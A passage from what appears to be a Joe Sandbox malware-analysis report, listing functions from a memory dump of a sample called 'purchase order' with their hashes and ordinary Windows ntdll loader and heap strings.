                                                                                                              • Instruction Fuzzy Hash: F4A16C7191162A9BDB219F68CC89BEDB7B8FF44700F0001EAE909AB250E7359E84CF54
                                                                                                              Function 01580BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015CA121
                                                                                                              • LdrpCheckModule, xrefs: 015CA117
                                                                                                              • Failed to allocated memory for shimmed module list, xrefs: 015CA10F
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-161242083
                                                                                                              • Opcode ID: aaf48570a68944fde102e483a4de077c761a37fac9853f194afce835cfb8059f
                                                                                                              • Instruction ID: b03ed3c087b9114fa2e4665b372bd00b1e690ff2a7595d459502c4f41f3d98d3
                                                                                                              • Opcode Fuzzy Hash: aaf48570a68944fde102e483a4de077c761a37fac9853f194afce835cfb8059f
                                                                                                              • Instruction Fuzzy Hash: 9E71AE71A00306DFDB25EFA8CD85AAEBBF4FB84604F14446DE802AF251E734A945CB50
                                                                                                              Function 01570A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-1334570610
                                                                                                              • Opcode ID: 1afb1e81a7b6ca38c0fa6770d909eac1a063077fabfd3fa3acbda405e66d1ddc
                                                                                                              • Instruction ID: 89b7066390603ed7ea87d00613b60ce24e14321d6677b48ed75588d44617d444
                                                                                                              • Opcode Fuzzy Hash: 1afb1e81a7b6ca38c0fa6770d909eac1a063077fabfd3fa3acbda405e66d1ddc
                                                                                                              • Instruction Fuzzy Hash: DF61CE706103029FDB29DF68D845B6ABBE1FF46B04F14855EE8498F282D7B0E981CB90
                                                                                                              Function 0159C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015D82E8
                                                                                                              • LdrpInitializePerUserWindowsDirectory, xrefs: 015D82DE
                                                                                                              • Failed to reallocate the system dirs string !, xrefs: 015D82D7
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-1783798831
                                                                                                              • Opcode ID: 7900917b486ec65c9fed62dc2bdc1ced1d3088bf9a108e9572dbf74783306658
                                                                                                              • Instruction ID: 88fd70da565884e6672ffed4edb3718c35003de4843e90f3e72d083f88ca0c22
                                                                                                              • Opcode Fuzzy Hash: 7900917b486ec65c9fed62dc2bdc1ced1d3088bf9a108e9572dbf74783306658
                                                                                                              • Instruction Fuzzy Hash: EE41CF71554312ABDB31EB68EC45B5F77E8FB84760F00592AF9489B290E774D810CBA2
                                                                                                              Function 0161C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • PreferredUILanguages, xrefs: 0161C212
                                                                                                              • @, xrefs: 0161C1F1
                                                                                                              • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0161C1C5
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                              • API String ID: 0-2968386058
                                                                                                              • Opcode ID: 302841dfdce6238d5a6905186eaaadb6c8e7443db1a4443f86aff36eda27198d
                                                                                                              • Instruction ID: 586370772e299a7ecc36b7fcc701a7508e32b4ec17536664d044146117f4197a
                                                                                                              • Opcode Fuzzy Hash: 302841dfdce6238d5a6905186eaaadb6c8e7443db1a4443f86aff36eda27198d
                                                                                                              • Instruction Fuzzy Hash: A4418272E4020AEBDF11DBD8CC51FEEBBB8BB54710F18806AEA09F7244D7749A458B50
                                                                                                              Function 015F4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                              • API String ID: 0-1373925480
                                                                                                              • Opcode ID: b8499fa3a7468a4679ca953b8d540e0d9f6ffbf1660b42bfdbb251b80a0bc3f5
                                                                                                              • Instruction ID: d1fe9600b9058eb6be141ac09f47b47e51735a33e75f8c4c0b4a9056a49dd172
                                                                                                              • Opcode Fuzzy Hash: b8499fa3a7468a4679ca953b8d540e0d9f6ffbf1660b42bfdbb251b80a0bc3f5
                                                                                                              • Instruction Fuzzy Hash: 9B410431A006598BEB25DBE8D844BAEBBF9FF95340F14046EDA01EF781DB348901CB11
                                                                                                              Function 015E4755 Relevance: 3.9, Strings: 3, Instructions: 121COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrredirect.c, xrefs: 015E4899
                                                                                                              • LdrpCheckRedirection, xrefs: 015E488F
                                                                                                              • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 015E4888
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                              • API String ID: 0-3154609507
                                                                                                              • Opcode ID: 8d49cfb3b17e09e07ed4003ff937fd06179429df2780314e66d8fd7ae1d2acf0
                                                                                                              • Instruction ID: d723f829bf00631b39f54bf086da7a0b7703a7f37b9744ebf12d56a4ecd0db0d
                                                                                                              • Opcode Fuzzy Hash: 8d49cfb3b17e09e07ed4003ff937fd06179429df2780314e66d8fd7ae1d2acf0
                                                                                                              • Instruction Fuzzy Hash: 6C41B072E087519BCB29CE6DD848A2A7BE5BF89A50F05055DED49DF211D730DC01CBD1
                                                                                                              Function 01570BBE Relevance: 3.8, Strings: 3, Instructions: 70COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                              • API String ID: 0-2558761708
                                                                                                              • Opcode ID: 027f70e8c6c3627e8215e02333492e2b5a7bd580e777e80eea1b2e99f4246bf9
                                                                                                              • Instruction ID: 2f7df51da19deb448e9cfd6e568763b5a3546380a1222047d7aac62466c4025e
                                                                                                              • Opcode Fuzzy Hash: 027f70e8c6c3627e8215e02333492e2b5a7bd580e777e80eea1b2e99f4246bf9
                                                                                                              • Instruction Fuzzy Hash: 3311AE313241029FD719CE58D896B3DF3E5BF82A15F14855EF40ACF291EB24E841C750
                                                                                                              Function 015E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • minkernel\ntdll\ldrinit.c, xrefs: 015E2104
                                                                                                              • LdrpInitializationFailure, xrefs: 015E20FA
                                                                                                              • Process initialization failed with status 0x%08lx, xrefs: 015E20F3
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                              • API String ID: 0-2986994758
                                                                                                              • Opcode ID: 5b776858cc54f659b86a098968b11d96738eca7c1c258ab89c72c012af250e88
                                                                                                              • Instruction ID: 358617a47d0b3183df0d1ee4c424324df899dd5c7d5eb30a178c6a73322bf68e
                                                                                                              • Opcode Fuzzy Hash: 5b776858cc54f659b86a098968b11d96738eca7c1c258ab89c72c012af250e88
                                                                                                              • Instruction Fuzzy Hash: 8EF0C835A803197BE728D64DDC4AFAD3BACFB80B94F500059F6416F685D2F0A650CA51
                                                                                                              Function 015703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ___swprintf_l
                                                                                                              • String ID: #%u
                                                                                                              • API String ID: 48624451-232158463
                                                                                                              • Opcode ID: f48bc2155b95c92ab7e63c3929f4fa5b07afe4168c1521ba0584233c64ba35bf
                                                                                                              • Instruction ID: 86ca5ca748e701f48eb4c397cbd46ffa4e5015163cc1e8b8c1db587dc954f1ee
                                                                                                              • Opcode Fuzzy Hash: f48bc2155b95c92ab7e63c3929f4fa5b07afe4168c1521ba0584233c64ba35bf
                                                                                                              • Instruction Fuzzy Hash: A6715A71A0010A9FDB05DFA8D995FAEBBF8FF48704F144069E905AB291EB34E901CB61
                                                                                                              Function 0156A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • LdrResSearchResource Enter, xrefs: 0156AA13
                                                                                                              • LdrResSearchResource Exit, xrefs: 0156AA25
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                                                                              • API String ID: 0-4066393604
                                                                                                              • Opcode ID: fea51824f888e1786050000a2f4b8b6e14e47483c18614ae173a486113555108
                                                                                                              • Instruction ID: f2c13c7baf6cdcd6376902ba9eebe36693f02d03fc73d07ce0ed0c28860e4821
                                                                                                              • Opcode Fuzzy Hash: fea51824f888e1786050000a2f4b8b6e14e47483c18614ae173a486113555108
                                                                                                              • Instruction Fuzzy Hash: 19E14E71A0021A9FEB22CED9C980BAEBBBDFF45710F14452AE911FF251D7749941CB90
                                                                                                              Function 0162A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: `$`
                                                                                                              • API String ID: 0-197956300
                                                                                                              • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction ID: 178e05dcbba519333b4b3a36aa888149f45ef8687591e28307578a92fa8aa1b8
                                                                                                              • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                              • Instruction Fuzzy Hash: 17C1BE31204B629BE724CF68CC41B6BBBE6AFD4318F084A2DF6968B690D7B4D505CF45
                                                                                                              Function 015DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Legacy$UEFI
                                                                                                              • API String ID: 2994545307-634100481
                                                                                                              • Opcode ID: 1a8686643ded9e114694e72eb1bc75d41f00535bf78ad27d48120872c7ae3a4b
                                                                                                              • Instruction ID: a74450477723ab3cb95511dd04a067cfd4803bdb3acd693512572146eea4d064
                                                                                                              • Opcode Fuzzy Hash: 1a8686643ded9e114694e72eb1bc75d41f00535bf78ad27d48120872c7ae3a4b
                                                                                                              • Instruction Fuzzy Hash: D9614971E406099FDB25DFA8C882BAEBBF9FB48700F14446DE649EF291D731A941CB50
                                                                                                              Function 016043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: @$MUI
                                                                                                              • API String ID: 0-17815947
                                                                                                              • Opcode ID: 9d1edd04207167e84167b67fdc383db68c6afea11e42cd617d0cdca3b738cbb2
                                                                                                              • Instruction ID: 1846c3cceb958b092542699a3ed5d8b22e432340a7b96ee84baeaff0aa3273a2
                                                                                                              • Opcode Fuzzy Hash: 9d1edd04207167e84167b67fdc383db68c6afea11e42cd617d0cdca3b738cbb2
                                                                                                              • Instruction Fuzzy Hash: 6D510A71D4021EAEDB16DFA5CC81AEFBBBCFB44654F100529E611BB290DB319D058B60
                                                                                                              Function 015604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0156063D
                                                                                                              • kLsE, xrefs: 01560540
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                              • API String ID: 0-2547482624
                                                                                                              • Opcode ID: 3fc984f39ec469b3baf3ff617a4436e6dc0166b322c01be58f5827507b62e3f2
                                                                                                              • Instruction ID: 56ba19ea42a14ac608086d7a0ab279ab11f9913d219d8e64ca139055adcede3a
                                                                                                              • Opcode Fuzzy Hash: 3fc984f39ec469b3baf3ff617a4436e6dc0166b322c01be58f5827507b62e3f2
                                                                                                              • Instruction Fuzzy Hash: A5519F715147428BD725EF68C5406ABBBE8BF84304F10483EF69A8B281E774D945CFE2
                                                                                                              Function 0156A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • RtlpResUltimateFallbackInfo Exit, xrefs: 0156A309
                                                                                                              • RtlpResUltimateFallbackInfo Enter, xrefs: 0156A2FB
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                              • API String ID: 0-2876891731
                                                                                                              • Opcode ID: 6feb630945b7fdc069c1eb4333e3b2176f1b962fc6cb430c68694fd8fa0cc4ef
                                                                                                              • Instruction ID: 49fe5cf16a294e6a4dd851d2024838b1a66c8a0bac6d3d5b55be03da7ec2e1cb
                                                                                                              • Opcode Fuzzy Hash: 6feb630945b7fdc069c1eb4333e3b2176f1b962fc6cb430c68694fd8fa0cc4ef
                                                                                                              • Instruction Fuzzy Hash: 85418A30B04646DFDB258F99C840B6E7BF8BF85714F1444A9EA10EF295E6B5D940CB90
                                                                                                              Function 0159A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: InitializeThunk
                                                                                                              • String ID: Cleanup Group$Threadpool!
                                                                                                              • API String ID: 2994545307-4008356553
                                                                                                              • Opcode ID: 15b18b91d99eab5b93e3b92c909ae040fd0f8b61d5fd283fb47ef4dc46b8865b
                                                                                                              • Instruction ID: 9fef43d8e0172643870cae2298ac1894d745b49c6fa5b449d55d9475c29d9dc5
                                                                                                              • Opcode Fuzzy Hash: 15b18b91d99eab5b93e3b92c909ae040fd0f8b61d5fd283fb47ef4dc46b8865b
                                                                                                              • Instruction Fuzzy Hash: 0C01D1B2654704AFD311DF24CD45B167BE8F784716F018939A648CB190E374D804CBA6
                                                                                                              Function 0156C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: MUI
                                                                                                              • API String ID: 0-1339004836
                                                                                                              • Opcode ID: 01c2dc5501dc694a77c0d44758aa910fb8873611a9a853c9399e6f3d5bc43deb
                                                                                                              • Instruction ID: 8a6439ee86ce23736b275efdd805bb7ff054b18b2c23b2918883e27c320e1279
                                                                                                              • Opcode Fuzzy Hash: 01c2dc5501dc694a77c0d44758aa910fb8873611a9a853c9399e6f3d5bc43deb
                                                                                                              • Instruction Fuzzy Hash: 8C827B75E002598FEB24CFA9C880BEDBBB9BF48310F148569D999AF351DB709D41CB90
                                                                                                              Function 015E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: 67d0b6c164ee8116f8f707ead464c5a5ecda93865a80260141736df096592e82
                                                                                                              • Instruction ID: 6d65352e66dbe4e9ffc917adca0d2afaea07ecc3fe23531198703e102870b22b
                                                                                                              • Opcode Fuzzy Hash: 67d0b6c164ee8116f8f707ead464c5a5ecda93865a80260141736df096592e82
                                                                                                              • Instruction Fuzzy Hash: 64914F71A5021AAFEB25EB95DD85FAEBBB8FF54B50F500055F600BF190D674E900CBA0
                                                                                                              Function 0160E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID: 0-3916222277
                                                                                                              • Opcode ID: c19bcfda88c0de7372b514a646d55eb722e440ddd73d553f339384b3e5587b94
                                                                                                              • Instruction ID: 3ca91dba0ce4864ce09bb38706fac8864337c349435d6fb40292a3ece6a18f25
                                                                                                              • Opcode Fuzzy Hash: c19bcfda88c0de7372b514a646d55eb722e440ddd73d553f339384b3e5587b94
                                                                                                              • Instruction Fuzzy Hash: 1691C13190121ABEDB2BABA5DC44FAFBF79FF85750F100429F501AB290D7769902CB51
                                                                                                              Function 0159A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: GlobalTags
                                                                                                              • API String ID: 0-1106856819
                                                                                                              • Opcode ID: 085c6346e8d0158048006b1a5d4578668770650e595166eb74a9404a947644dd
                                                                                                              • Instruction ID: e2d2b27108d4503a014793bc71b8c17b2eb53b9bf641fe87730c51900ae71874
                                                                                                              • Opcode Fuzzy Hash: 085c6346e8d0158048006b1a5d4578668770650e595166eb74a9404a947644dd
                                                                                                              • Instruction Fuzzy Hash: E8716DB5E0020ADFDF28DF9CD5916ADBBF1BF98710F14852EE905AB241E7309942CB60
                                                                                                              Function 01604978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: .mui
                                                                                                              • API String ID: 0-1199573805
                                                                                                              • Opcode ID: 11000413cfc3a96883f831070abc83ac9f00483f217f21ff17195e119286b2a6
                                                                                                              • Instruction ID: 6cd1a6b7ee0029d0de2f31d6bb6bd996137ccbb4a191c75359c9d51869fc68fb
                                                                                                              • Opcode Fuzzy Hash: 11000413cfc3a96883f831070abc83ac9f00483f217f21ff17195e119286b2a6
                                                                                                              • Instruction Fuzzy Hash: 66519472D006269BDB26DF99DC40AAFBBB4BF48710F054169EE11BB394DB749801CBE4
                                                                                                              Function 0157E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: EXT-
                                                                                                              • API String ID: 0-1948896318
                                                                                                              • Opcode ID: c1e50d7722f993dbeb32a43adcd8c7f6130c108f8612c10323ff22757763bb8d
                                                                                                              • Instruction ID: c276aa31e1ff5013c01dca9953b04308a8aa65c7878d22dfc5d6bbe209bbedee
                                                                                                              • Opcode Fuzzy Hash: c1e50d7722f993dbeb32a43adcd8c7f6130c108f8612c10323ff22757763bb8d
                                                                                                              • Instruction Fuzzy Hash: 5E4191725083929BD711DA79E882B6FBBE8FFC8714F44096DF984EF140E674D9048792
                                                                                                              Function 015DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryHash
                                                                                                              • API String ID: 0-2202222882
                                                                                                              • Opcode ID: e886d9c6700660da9179c404a971f6b512a519925182982b2537ccddfd826412
                                                                                                              • Instruction ID: c4d2ab14e7ca3d46c1608e8f29e26a6d8e77af7b9180ab7fd1939671e31cdb3d
                                                                                                              • Opcode Fuzzy Hash: e886d9c6700660da9179c404a971f6b512a519925182982b2537ccddfd826412
                                                                                                              • Instruction Fuzzy Hash: 854133B1D4012EABDB21DA64CC85FDEB77CBB44714F4045A9A708AF140DB709E89CFA4
                                                                                                              Function 015F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: #
                                                                                                              • API String ID: 0-1885708031
                                                                                                              • Opcode ID: 8bb7e5047a885dd5e1dccab6a35f3e6204860a09aa13f3b8b54d1a62b0ae0bac
                                                                                                              • Instruction ID: fc7d403aeb2738fa22e8ff4714f47200b4c5647b485bb1df83c5857a65d6fac8
                                                                                                              • Opcode Fuzzy Hash: 8bb7e5047a885dd5e1dccab6a35f3e6204860a09aa13f3b8b54d1a62b0ae0bac
                                                                                                              • Instruction Fuzzy Hash: D531F631A407199AEB22DB69C854BAE7BA8FF45704F54406CEA81AF282D775EC05CB50
                                                                                                              Function 015DCA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: BinaryName
                                                                                                              • API String ID: 0-215506332
                                                                                                              • Opcode ID: f0bfb274d3f90c8e0c906dad6ddb6b9c27dc17d201d37fc6347f376b7422ff8e
                                                                                                              • Instruction ID: 85364098879195a83a20626e82fecd1e92fc7c5ef192801ce4acdedf21d8ed3e
                                                                                                              • Opcode Fuzzy Hash: f0bfb274d3f90c8e0c906dad6ddb6b9c27dc17d201d37fc6347f376b7422ff8e
                                                                                                              • Instruction Fuzzy Hash: 0431DF7690051AAFEB26DA5DC845E6FBBB4FB80720F41456DE905AF250D730EE04EBE0
                                                                                                              Function 015E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 015E895E
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2358964709.0000000001530000.00000040.00001000.00020000.00000000.sdmp, Offset: 01530000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_1530000_purchase order.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
